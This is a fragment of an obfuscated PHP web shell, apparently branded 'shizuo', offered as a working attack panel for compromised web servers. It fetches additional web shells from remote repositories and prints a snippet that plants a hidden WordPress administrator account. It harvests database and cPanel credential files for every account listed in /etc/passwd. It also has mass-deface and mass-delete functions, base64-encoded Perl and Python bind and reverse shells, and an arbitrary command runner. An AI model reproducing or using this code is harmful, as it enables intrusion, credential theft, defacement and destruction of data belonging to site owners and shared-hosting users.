</div>";echo "<b><center class=anu>";if(isset($_GET['id_two'])&&$_GET['id_two']=="wso"){echo "<center class='anu'>Get Wso Shell<br>";function wso($wdu4101391790,$dez2285623924){$tfi578531298=fopen($dez2285623924,"w");$vcz1281410033=curl_init();curl_setopt($vcz1281410033,CURLOPT_URL,$wdu4101391790);curl_setopt($vcz1281410033,CURLOPT_BINARYTRANSFER,true);curl_setopt($vcz1281410033,CURLOPT_RETURNTRANSFER,true);curl_setopt($vcz1281410033,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($vcz1281410033,CURLOPT_FILE,$tfi578531298);return curl_exec($vcz1281410033);curl_close($vcz1281410033);fclose($tfi578531298);ob_flush();flush();}if(file_exists('babiwso.php')){echo"<gr><a style='color:white;text-decoration:none;' href=$jxg3766473888/babiscan.php target='_blank'>Click Here</a></gr></center>";}else{if(wso("https://raw.githubusercontent.com/BOTKNTL/kontol/master/wso425.php","babiwso.php")){echo"<gr><a style='color:white;text-decoration:none;' href=$jxg3766473888/babiwso.php target='_blank'>Click Here</a></gr></center>";}else{echo "<rd>Failed to create wso shell</rd>";}}echo "</center>";}elseif(isset($_GET['id_two'])&&$_GET['id_two']=="alfa"){echo "<center class='anu'>Get Alfa Shell<br>";function alfa($wdu4101391790,$dez2285623924){$tfi578531298=fopen($dez2285623924,"w");$vcz1281410033=curl_init();curl_setopt($vcz1281410033,CURLOPT_URL,$wdu4101391790);curl_setopt($vcz1281410033,CURLOPT_BINARYTRANSFER,true);curl_setopt($vcz1281410033,CURLOPT_RETURNTRANSFER,true);curl_setopt($vcz1281410033,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($vcz1281410033,CURLOPT_FILE,$tfi578531298);return curl_exec($vcz1281410033);curl_close($vcz1281410033);fclose($tfi578531298);ob_flush();flush();}if(file_exists('babialfa.php')){echo"<gr><a style='color:white;text-decoration:none;' href=$jxg3766473888/babialfa.php target='_blank'>Click Here</a></gr></center>";}else{if(alfa("https://raw.githubusercontent.com/BOTKNTL/kontol/master/alfatesla.php","babialfa.php")){echo"<gr><a style='color:white;text-decoration:none;' href=$jxg3766473888/babialfa.php target='_blank'>Click Here</a></gr></center>";}else{echo "<rd>Failed to create alfa shell</rd>";}}}elseif(isset($_GET['id_two'])&&$_GET['id_two']=="marijuana"){echo "<center class='anu'>Get Marijuana Shell<br>";function marijuana($wdu4101391790,$dez2285623924){$tfi578531298=fopen($dez2285623924,"w");$vcz1281410033=curl_init();curl_setopt($vcz1281410033,CURLOPT_URL,$wdu4101391790);curl_setopt($vcz1281410033,CURLOPT_BINARYTRANSFER,true);curl_setopt($vcz1281410033,CURLOPT_RETURNTRANSFER,true);curl_setopt($vcz1281410033,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($vcz1281410033,CURLOPT_FILE,$tfi578531298);return curl_exec($vcz1281410033);curl_close($vcz1281410033);fclose($tfi578531298);ob_flush();flush();}if(file_exists('babimarijuana.php')){echo"<gr><a style='color:white;text-decoration:none;' href=$jxg3766473888/babimarijuana.php target='_blank'>Click Here</a></gr></center>";}else{if(marijuana("https://raw.githubusercontent.com/BOTKNTL/kontol/master/maricoli.php","babimarijuana.php")){echo"<gr><a style='color:white;text-decoration:none;' href=$jxg3766473888/babimarijuana.php target='_blank'>Click Here</a></gr></center>";}else{echo "<rd>Failed to create marijuana shell:(</rd>";}}echo "</center>";}elseif(isset($_GET['id_two'])&&$_GET['id_two']=="wpadd"){?>
<div class='container-fluid language-javascript'>
<div class='shell mb-3'>
<pre style='font-size:10px;'><code>function shizuoadmin(){
$login = 'shizuo';
$passw = 'shizuo#1337';
$email = '[email protected]';
if ( !username_exists( $login ) && !email_exists( $email ) ) {
$user_id = wp_create_user( $login, $passw, $email );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
add_action('init','shizuoadmin');</code></pre>
</div>
Add the above code in the functions.php file on the target website.<br>
example: https://site.gov/wp-content/themes/[theme name/functions.php
</div><?php }elseif(isset($_GET['id_two'])&&$_GET['id_two']=="csrf"){echo "<div class='card card-body text-dark input-group mb-3'>
<form method='POST'> Target:<input class='form-control btn-sm' type='text' name='url' size='50' height='10' placeholder='http://victim.com/[PATH]/upload.php' style='margin: 5px auto; padding-left: 5px;' required>
POST File: <input class='form-control btn-sm' type='text' name='pf' size='50' height='10' placeholder='Filedata, dzupload, dzfile, dzfiles, file, ajaxfup, files[], qqfile, userfile' style='margin: 5px auto; padding-left: 5px;' required>
<input class='btn btn-dark btn-sm' type='submit' name='d' value='Lock!'></form>";$wdu4101391790=$_POST["url"];$ljf3392647012=$_POST["pf"];$gxs2564639436=$_POST["d"];if($gxs2564639436){echo"<br><form method='post' target='_blank' action='$wdu4101391790' enctype='multipart/form-data'><input class='form-control btn-sm' type='file' name='$ljf3392647012'>
<input class='btn btn-dark btn-sm' type='submit' name='g' value='Upload!'></form></form></div>";}}elseif(isset($_GET['id_two'])&&$_GET['id_two']=="shellscan"){echo "<center class='anu'>Get Shell Backdoor Detector<br>";function babidetect($wdu4101391790,$dez2285623924){$tfi578531298=fopen($dez2285623924,"w");$vcz1281410033=curl_init();curl_setopt($vcz1281410033,CURLOPT_URL,$wdu4101391790);curl_setopt($vcz1281410033,CURLOPT_BINARYTRANSFER,true);curl_setopt($vcz1281410033,CURLOPT_RETURNTRANSFER,true);curl_setopt($vcz1281410033,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($vcz1281410033,CURLOPT_FILE,$tfi578531298);return curl_exec($vcz1281410033);curl_close($vcz1281410033);fclose($tfi578531298);ob_flush();flush();}if(file_exists('babidetect.php')){echo"<gr><a style='color:white;text-decoration:none;' href=$jxg3766473888/babidetect.php target='_blank'>Click Here</a></gr></center>";}else{if(babidetect("https://gitlab.com/jasonrondiguez/a/-/raw/main/t0000000ls/shellllllllscaaannnnn.php","babidetect.php")){echo"<gr><a style='color:white;text-decoration:none;' href=$jxg3766473888/babidetect.php target='_blank'>Click Here</a></gr></center>";}else{echo "<rd>Failed to create shell backdoor detector:(</rd>";}}echo "</center>";}}if($azu3293050475['id']=='config'){echo '<center class="anu"><br>Grab Config by shizuo</center>';$lyl783637705=fopen("/etc/passwd","r")or die("<rd>can't read /etc/passwd:(</rd>");$lov3876093456=mkdir("shizuo_CONFIG",0777);$zcg3499406695="Options allnRequire NonenSatisfy Any";$xww644730778=fopen("shizuo_CONFIG/.htaccess","w");fwrite($xww644730778,$zcg3499406695);while($sqq456024468=fgets($lyl783637705)){if($sqq456024468==""||!$lyl783637705){echo "<rd>Can't read /etc/passwd:(</rd>";}else{preg_match_all('/(.*?):x:/',$sqq456024468,$vbe2983736385);foreach($vbe2983736385[1]as $yag87770677){$aiu42851827="/home/$yag87770677/public_html/";if(is_readable($aiu42851827)){$csg2312585810=array("/home/$yag87770677/.my.cnf"=>"cpanel","/home/$yag87770677/.accesshash"=>"WHM-accesshash","/home/$yag87770677/config/koneksi.php"=>"Lokomedia","/home/$yag87770677/forum/config.php"=>"phpBB","/home/$yag87770677/sites/default/settings.php"=>"Drupal","/home/$yag87770677/config/settings.inc.php"=>"PrestaShop","/home/$yag87770677/app/etc/local.xml"=>"Magento","/home/$yag87770677/admin/config.php"=>"OpenCart","/home/$yag87770677/application/config/database.php"=>"Ellislab","/home/$yag87770677/vb/includes/config.php"=>"Vbulletin","/home/$yag87770677/includes/config.php"=>"Vbulletin","/home/$yag87770677/forum/includes/config.php"=>"Vbulletin","/home/$yag87770677/forums/includes/config.php"=>"Vbulletin","/home/$yag87770677/cc/includes/config.php"=>"Vbulletin","/home/$yag87770677/inc/config.php"=>"MyBB","/home/$yag87770677/includes/configure.php"=>"OsCommerce","/home/$yag87770677/shop/includes/configure.php"=>"OsCommerce","/home/$yag87770677/os/includes/configure.php"=>"OsCommerce","/home/$yag87770677/oscom/includes/configure.php"=>"OsCommerce","/home/$yag87770677/products/includes/configure.php"=>"OsCommerce","/home/$yag87770677/cart/includes/configure.php"=>"OsCommerce","/home/$yag87770677/inc/conf_global.php"=>"IPB","/home/$yag87770677/wp-config.php"=>"Wordpress","/home/$yag87770677/wp/test/wp-config.php"=>"Wordpress","/home/$yag87770677/blog/wp-config.php"=>"Wordpress","/home/$yag87770677/beta/wp-config.php"=>"Wordpress","/home/$yag87770677/portal/wp-config.php"=>"Wordpress","/home/$yag87770677/site/wp-config.php"=>"Wordpress","/home/$yag87770677/wp/wp-config.php"=>"Wordpress","/home/$yag87770677/WP/wp-config.php"=>"Wordpress","/home/$yag87770677/news/wp-config.php"=>"Wordpress","/home/$yag87770677/wordpress/wp-config.php"=>"Wordpress","/home/$yag87770677/test/wp-config.php"=>"Wordpress","/home/$yag87770677/demo/wp-config.php"=>"Wordpress","/home/$yag87770677/home/wp-config.php"=>"Wordpress","/home/$yag87770677/v1/wp-config.php"=>"Wordpress","/home/$yag87770677/v2/wp-config.php"=>"Wordpress","/home/$yag87770677/press/wp-config.php"=>"Wordpress","/home/$yag87770677/new/wp-config.php"=>"Wordpress","/home/$yag87770677/blogs/wp-config.php"=>"Wordpress","/home/$yag87770677/configuration.php"=>"Joomla","/home/$yag87770677/blog/configuration.php"=>"Joomla","/home/$yag87770677/submitticket.php"=>"^WHMCS","/home/$yag87770677/cms/configuration.php"=>"Joomla","/home/$yag87770677/beta/configuration.php"=>"Joomla","/home/$yag87770677/portal/configuration.php"=>"Joomla","/home/$yag87770677/site/configuration.php"=>"Joomla","/home/$yag87770677/main/configuration.php"=>"Joomla","/home/$yag87770677/home/configuration.php"=>"Joomla","/home/$yag87770677/demo/configuration.php"=>"Joomla","/home/$yag87770677/test/configuration.php"=>"Joomla","/home/$yag87770677/v1/configuration.php"=>"Joomla","/home/$yag87770677/v2/configuration.php"=>"Joomla","/home/$yag87770677/joomla/configuration.php"=>"Joomla","/home/$yag87770677/new/configuration.php"=>"Joomla","/home/$yag87770677/WHMCS/submitticket.php"=>"WHMCS","/home/$yag87770677/whmcs1/submitticket.php"=>"WHMCS","/home/$yag87770677/Whmcs/submitticket.php"=>"WHMCS","/home/$yag87770677/whmcs/submitticket.php"=>"WHMCS","/home/$yag87770677/whmcs/submitticket.php"=>"WHMCS","/home/$yag87770677/WHMC/submitticket.php"=>"WHMCS","/home/$yag87770677/Whmc/submitticket.php"=>"WHMCS","/home/$yag87770677/whmc/submitticket.php"=>"WHMCS","/home/$yag87770677/WHM/submitticket.php"=>"WHMCS","/home/$yag87770677/Whm/submitticket.php"=>"WHMCS","/home/$yag87770677/whm/submitticket.php"=>"WHMCS","/home/$yag87770677/HOST/submitticket.php"=>"WHMCS","/home/$yag87770677/Host/submitticket.php"=>"WHMCS","/home/$yag87770677/host/submitticket.php"=>"WHMCS","/home/$yag87770677/SUPPORTES/submitticket.php"=>"WHMCS","/home/$yag87770677/Supportes/submitticket.php"=>"WHMCS","/home/$yag87770677/supportes/submitticket.php"=>"WHMCS","/home/$yag87770677/domains/submitticket.php"=>"WHMCS","/home/$yag87770677/domain/submitticket.php"=>"WHMCS","/home/$yag87770677/Hosting/submitticket.php"=>"WHMCS","/home/$yag87770677/HOSTING/submitticket.php"=>"WHMCS","/home/$yag87770677/hosting/submitticket.php"=>"WHMCS","/home/$yag87770677/CART/submitticket.php"=>"WHMCS","/home/$yag87770677/Cart/submitticket.php"=>"WHMCS","/home/$yag87770677/cart/submitticket.php"=>"WHMCS","/home/$yag87770677/ORDER/submitticket.php"=>"WHMCS","/home/$yag87770677/Order/submitticket.php"=>"WHMCS","/home/$yag87770677/order/submitticket.php"=>"WHMCS","/home/$yag87770677/CLIENT/submitticket.php"=>"WHMCS","/home/$yag87770677/Client/submitticket.php"=>"WHMCS","/home/$yag87770677/client/submitticket.php"=>"WHMCS","/home/$yag87770677/CLIENTAREA/submitticket.php"=>"WHMCS","/home/$yag87770677/Clientarea/submitticket.php"=>"WHMCS","/home/$yag87770677/clientarea/submitticket.php"=>"WHMCS","/home/$yag87770677/SUPPORT/submitticket.php"=>"WHMCS","/home/$yag87770677/Support/submitticket.php"=>"WHMCS","/home/$yag87770677/support/submitticket.php"=>"WHMCS","/home/$yag87770677/BILLING/submitticket.php"=>"WHMCS","/home/$yag87770677/Billing/submitticket.php"=>"WHMCS","/home/$yag87770677/billing/submitticket.php"=>"WHMCS","/home/$yag87770677/BUY/submitticket.php"=>"WHMCS","/home/$yag87770677/Buy/submitticket.php"=>"WHMCS","/home/$yag87770677/buy/submitticket.php"=>"WHMCS","/home/$yag87770677/MANAGE/submitticket.php"=>"WHMCS","/home/$yag87770677/Manage/submitticket.php"=>"WHMCS","/home/$yag87770677/manage/submitticket.php"=>"WHMCS","/home/$yag87770677/CLIENTSUPPORT/submitticket.php"=>"WHMCS","/home/$yag87770677/ClientSupport/submitticket.php"=>"WHMCS","/home/$yag87770677/Clientsupport/submitticket.php"=>"WHMCS","/home/$yag87770677/clientsupport/submitticket.php"=>"WHMCS","/home/$yag87770677/CHECKOUT/submitticket.php"=>"WHMCS","/home/$yag87770677/Checkout/submitticket.php"=>"WHMCS","/home/$yag87770677/checkout/submitticket.php"=>"WHMCS","/home/$yag87770677/BILLINGS/submitticket.php"=>"WHMCS","/home/$yag87770677/Billings/submitticket.php"=>"WHMCS","/home/$yag87770677/billings/submitticket.php"=>"WHMCS","/home/$yag87770677/BASKET/submitticket.php"=>"WHMCS","/home/$yag87770677/Basket/submitticket.php"=>"WHMCS","/home/$yag87770677/basket/submitticket.php"=>"WHMCS","/home/$yag87770677/SECURE/submitticket.php"=>"WHMCS","/home/$yag87770677/Secure/submitticket.php"=>"WHMCS","/home/$yag87770677/secure/submitticket.php"=>"WHMCS","/home/$yag87770677/SALES/submitticket.php"=>"WHMCS","/home/$yag87770677/Sales/submitticket.php"=>"WHMCS","/home/$yag87770677/sales/submitticket.php"=>"WHMCS","/home/$yag87770677/BILL/submitticket.php"=>"WHMCS","/home/$yag87770677/Bill/submitticket.php"=>"WHMCS","/home/$yag87770677/bill/submitticket.php"=>"WHMCS","/home/$yag87770677/PURCHASE/submitticket.php"=>"WHMCS","/home/$yag87770677/Purchase/submitticket.php"=>"WHMCS","/home/$yag87770677/purchase/submitticket.php"=>"WHMCS","/home/$yag87770677/ACCOUNT/submitticket.php"=>"WHMCS","/home/$yag87770677/Account/submitticket.php"=>"WHMCS","/home/$yag87770677/account/submitticket.php"=>"WHMCS","/home/$yag87770677/USER/submitticket.php"=>"WHMCS","/home/$yag87770677/User/submitticket.php"=>"WHMCS","/home/$yag87770677/user/submitticket.php"=>"WHMCS","/home/$yag87770677/CLIENTS/submitticket.php"=>"WHMCS","/home/$yag87770677/Clients/submitticket.php"=>"WHMCS","/home/$yag87770677/clients/submitticket.php"=>"WHMCS","/home/$yag87770677/BILLINGS/submitticket.php"=>"WHMCS","/home/$yag87770677/Billings/submitticket.php"=>"WHMCS","/home/$yag87770677/billings/submitticket.php"=>"WHMCS","/home/$yag87770677/MY/submitticket.php"=>"WHMCS","/home/$yag87770677/My/submitticket.php"=>"WHMCS","/home/$yag87770677/my/submitticket.php"=>"WHMCS","/home/$yag87770677/secure/whm/submitticket.php"=>"WHMCS","/home/$yag87770677/secure/whmcs/submitticket.php"=>"WHMCS","/home/$yag87770677/panel/submitticket.php"=>"WHMCS","/home/$yag87770677/clientes/submitticket.php"=>"WHMCS","/home/$yag87770677/cliente/submitticket.php"=>"WHMCS","/home/$yag87770677/support/order/submitticket.php"=>"WHMCS","/home/$yag87770677/bb-config.php"=>"BoxBilling","/home/$yag87770677/boxbilling/bb-config.php"=>"BoxBilling","/home/$yag87770677/box/bb-config.php"=>"BoxBilling","/home/$yag87770677/host/bb-config.php"=>"BoxBilling","/home/$yag87770677/Host/bb-config.php"=>"BoxBilling","/home/$yag87770677/supportes/bb-config.php"=>"BoxBilling","/home/$yag87770677/support/bb-config.php"=>"BoxBilling","/home/$yag87770677/hosting/bb-config.php"=>"BoxBilling","/home/$yag87770677/cart/bb-config.php"=>"BoxBilling","/home/$yag87770677/order/bb-config.php"=>"BoxBilling","/home/$yag87770677/client/bb-config.php"=>"BoxBilling","/home/$yag87770677/clients/bb-config.php"=>"BoxBilling","/home/$yag87770677/cliente/bb-config.php"=>"BoxBilling","/home/$yag87770677/clientes/bb-config.php"=>"BoxBilling","/home/$yag87770677/billing/bb-config.php"=>"BoxBilling","/home/$yag87770677/billings/bb-config.php"=>"BoxBilling","/home/$yag87770677/my/bb-config.php"=>"BoxBilling","/home/$yag87770677/secure/bb-config.php"=>"BoxBilling","/home/$yag87770677/support/order/bb-config.php"=>"BoxBilling","/home/$yag87770677/includes/dist-configure.php"=>"Zencart","/home/$yag87770677/zencart/includes/dist-configure.php"=>"Zencart","/home/$yag87770677/products/includes/dist-configure.php"=>"Zencart","/home/$yag87770677/cart/includes/dist-configure.php"=>"Zencart","/home/$yag87770677/shop/includes/dist-configure.php"=>"Zencart","/home/$yag87770677/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/hostbills/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/host/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/Host/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/supportes/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/support/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/hosting/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/cart/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/order/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/client/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/clients/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/cliente/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/clientes/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/billing/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/billings/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/my/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/secure/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/support/order/includes/iso4217.php"=>"Hostbills");foreach($csg2312585810 as $nbt3565825916=>$owm1454944971){$npf1092713712=file_get_contents($nbt3565825916);if($npf1092713712==''){}else{$cmm1822230979=fopen("shizuo_CONFIG/$yag87770677-$owm1454944971.txt","w");fputs($cmm1822230979,$npf1092713712);}}}}}}echo"<center><a style='text-decoration:none;color:white;' href='?path=$sol190089999/shizuo_CONFIG'><font>Click Here</font></a></center>";}if($azu3293050475['id']=='adminer'){echo "<center class='anu'>Get Adminer<br>";function adminer($wdu4101391790,$dez2285623924){$tfi578531298=fopen($dez2285623924,"w");$vcz1281410033=curl_init();curl_setopt($vcz1281410033,CURLOPT_URL,$wdu4101391790);curl_setopt($vcz1281410033,CURLOPT_BINARYTRANSFER,true);curl_setopt($vcz1281410033,CURLOPT_RETURNTRANSFER,true);curl_setopt($vcz1281410033,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($vcz1281410033,CURLOPT_FILE,$tfi578531298);return curl_exec($vcz1281410033);curl_close($vcz1281410033);fclose($tfi578531298);ob_flush();flush();}if(file_exists('adminer.php')){echo"<gr><a style='color:white;text-decoration:none;' href='$jxg3766473888/adminer.php' target='_blank'>Click Here</a></gr></center>";}else{if(adminer("","adminer.php")){echo"<gr><a style='color:white;text-decoration:none;' href='$jxg3766473888/adminer.php' target='_blank'>Click Here</a></gr></center>";}else{echo "<rd>Failed to create adminer:(</rd>";}}echo "</center>";}if($azu3293050475['id']=='deface'){function mass_all($oex3131800080,$vgn3319867140,$sls386395195){if(is_writable($oex3131800080)){$zrk4122608989=scandir($oex3131800080);foreach($zrk4122608989 as $oib1823692007){$zac464807025="$oex3131800080/$oib1823692007";$zfh1659275802=$zac464807025.'/'.$vgn3319867140;if($oib1823692007==='.'){file_put_contents($zfh1659275802,$sls386395195);}elseif($oib1823692007==='..'){file_put_contents($zfh1659275802,$sls386395195);}else{if(is_dir($zac464807025)){if(is_writable($zac464807025)){echo"[<gr><i class='bi bi-check-all'></i></gr>] $zfh1659275802<br>";file_put_contents($zfh1659275802,$sls386395195);$vvr311197333=mass_all($zac464807025,$vgn3319867140,$sls386395195);}}}}}}function mass_onedir($oex3131800080,$vgn3319867140,$sls386395195){if(is_writable($oex3131800080)){$zrk4122608989=scandir($oex3131800080);foreach($zrk4122608989 as $oib1823692007){$zac464807025="$oex3131800080/$oib1823692007";$zfh1659275802=$zac464807025.'/'.$vgn3319867140;if($oib1823692007==='.'){file_put_contents($zfh1659275802,$sls386395195);}elseif($oib1823692007==='..'){file_put_contents($zfh1659275802,$sls386395195);}else{if(is_dir($zac464807025)){if(is_writable($zac464807025)){echo"[<gr><i class='bi bi-check-all'></i></gr>] $oib1823692007/$vgn3319867140<br>";file_put_contents($zfh1659275802,$sls386395195);}}}}}}if($azu3293050475['start']){if($azu3293050475['tipe']=='mass'){mass_all($azu3293050475['d_dir'],$azu3293050475['d_file'],$azu3293050475['script']);}elseif($azu3293050475['tipe']=='onedir'){mass_onedir($azu3293050475['d_dir'],$azu3293050475['d_file'],$azu3293050475['script']);}}s();echo '<center class="anu">Mass Deface</center>';echo"
<div class='card card-body text-dark input-group mb-3'>
<form method='POST'> Select Type:
<div class='form-check'>
<input class='form-check-input' type='checkbox' value='onedir' name='tipe' id='flexCheckDefault' checked>
<label class='form-check-label' for='flexCheckDefault'>One directory</label>
</div>
<div class='form-check'>
<input class='form-check-input' type='checkbox' value='mass' name='tipe' id='flexCheckDefault'>
<label class='form-check-label' for='flexCheckDefault'>All directory</label>
</div>
<i class='bi bi-folder'></i> Directory:
<input class='form-control btn-sm text-dark' type='text' name='d_dir' value='$oex3131800080'>
<i class='bi bi-file-earmark'></i> Filename:
<input class='form-control btn-sm text-dark' type='text' name='d_file' placeholder='README.txt'>
<i class='bi bi-file-earmark'></i> Your Script:
<textarea class='form-control btn-sm text-dark' rows='7' name='script' placeholder='Hacked by shizuo'></textarea>
<div class='d-grid gap-2'>
<input class='btn btn-dark btn-sm' type='submit' name='start' value='Deface!'>
</div>
</form>
</div>";}if($azu3293050475['id']=='delete'){function mass_delete($oex3131800080,$vgn3319867140){if(is_writable($oex3131800080)){$zrk4122608989=scandir($oex3131800080);foreach($zrk4122608989 as $oib1823692007){$zac464807025="$oex3131800080/$oib1823692007";$zfh1659275802=$zac464807025.'/'.$vgn3319867140;if($oib1823692007==='.'){if(file_exists("$oex3131800080/$vgn3319867140")){unlink("$oex3131800080/$vgn3319867140");}}elseif($oib1823692007==='..'){if(file_exists("".dirname($oex3131800080)."/$vgn3319867140")){unlink("".dirname($oex3131800080)."/$vgn3319867140");}}else{if(is_dir($zac464807025)){if(is_writable($zac464807025)){if(file_exists($zfh1659275802)){echo"[<gr><i class='bi bi-check-all'></i></gr>] $zfh1659275802<br>";unlink($zfh1659275802);$vvr311197333=mass_delete($zac464807025,$vgn3319867140);}}}}}}}if($azu3293050475['start']){mass_delete($azu3293050475['d_dir'],$azu3293050475['d_file']);}s();echo '<center class="anu">Mass Delete</center>';echo"
<div class='card card-body text-dark input-group mb-3'>
<form method='POST'>
<i class='bi bi-folder'></i> Directory:
<input class='form-control btn-sm text-dark' type='text' name='d_dir' value='$oex3131800080' $hqb3270591348>
<i class='bi bi-file-earmark'></i> Filename:
<div class='input-group'>
<input class='form-control btn-sm text-dark' type='text' name='d_file' placeholder='filename' $hqb3270591348><br>
<div class='input-group-append'>
<input class='btn btn-dark btn-sm' type='submit' name='start' value='Delete!'>
</div>
</div>
</form>
</div>";}if($azu3293050475['id']=='network'){s();echo '<center class="anu">Network</center>';echo "
<div class='card text-dark'>
<div class='card-header'>
<form method='post'>
Bind port to /bin/sh [perl]<br>
Port:
<div class='input-group'>
<input class='form-control btn-sm text-dark' type='text' name='port' placeholder='1337'>
<input class='btn btn-dark btn-sm' type='submit' name='bpl' value='Submit!'>
</div>
Back Connect<br>
Server:
<input class='form-control btn-sm text-dark' type='text' name='server' placeholder='".$_SERVER['REMOTE_ADDR']."'>
Port:
<div class='input-group'>
<input class='form-control btn-sm text-dark' type='text' name='port' placeholder='1337'>
<select class='form-control btn-sm text-dark' name='bc'>
<option value='perl'>perl</option>
<option value='python'>python</option>
</select>
</div>
<div class='d-grid gap-2'>
<input class='btn btn-dark btn-sm btn-block' type='submit' value='Submit!'>
</div>
</form>";if($azu3293050475['bpl']){$giz1175939814=base64_decode("IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=");$lzk4268976141=@fopen('bp.pl','w');fwrite($lzk4268976141,$giz1175939814);$bpp3119148441=exe("perl bp.pl ".$azu3293050475['port']." 1>/dev/null 2>&1 &");sleep(1);echo"<pre>$amk4049756767".exe("ps aux | grep bp.pl")."</pre>";unlink("bp.pl");}if($azu3293050475['bc']=='perl'){$jkk3265866552=base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7");$trn2294707203=@fopen('bc.pl','w');fwrite($trn2294707203,$jkk3265866552);$bpp3119148441=exe("perl bc.pl ".$azu3293050475['server']." ".$azu3293050475['port']." 1>/dev/null 2>&1 &");sleep(1);echo"<pre>$amk4049756767".exe("ps aux | grep bc.pl")."</pre>";unlink("bc.pl");}if($azu3293050475['bc']=='python'){$jvw1833259582=base64_decode("IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBNci54QmFyYWt1ZGFcblRoYW5rcyBHb29nbGUgRm9yIFJlZmVyZW5zaVxuXG4nJycpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMCkNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwxKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDIpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMykNCiAgICBzaGVsbCA9IHN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKQ0KICBleGNlcHQgc29ja2V0LnRpbWVvdXQ6DQogICAgcHJpbnQgIlRpbU91dCINCiAgZXhjZXB0IHNvY2tldC5lcnJvciwgZToNCiAgICBwcmludCAiRXJyb3IiLCBlDQpweWJhY2tjb25uZWN0KCk=");$emi294062401=@fopen('bcpy.py','w');fwrite($emi294062401,$jvw1833259582);$eyg4228488635=exe("python bcpy.py ".$azu3293050475['server']." ".$azu3293050475['port']);sleep(1);echo"<pre>$ezv608682059".exe("ps aux | grep bcpy.py")."</pre>";unlink("bcpy.py");}echo "</div>
</div>
<br/>";}if($azu3293050475['id']=='cmd'){s();echo '<center class="anu">Command</center>';if(!empty($_POST['cmd'])){$enu794565824=exe($_POST['cmd'].' 2>&1');}echo "
<div class='mb-3'>
<form method='POST'>
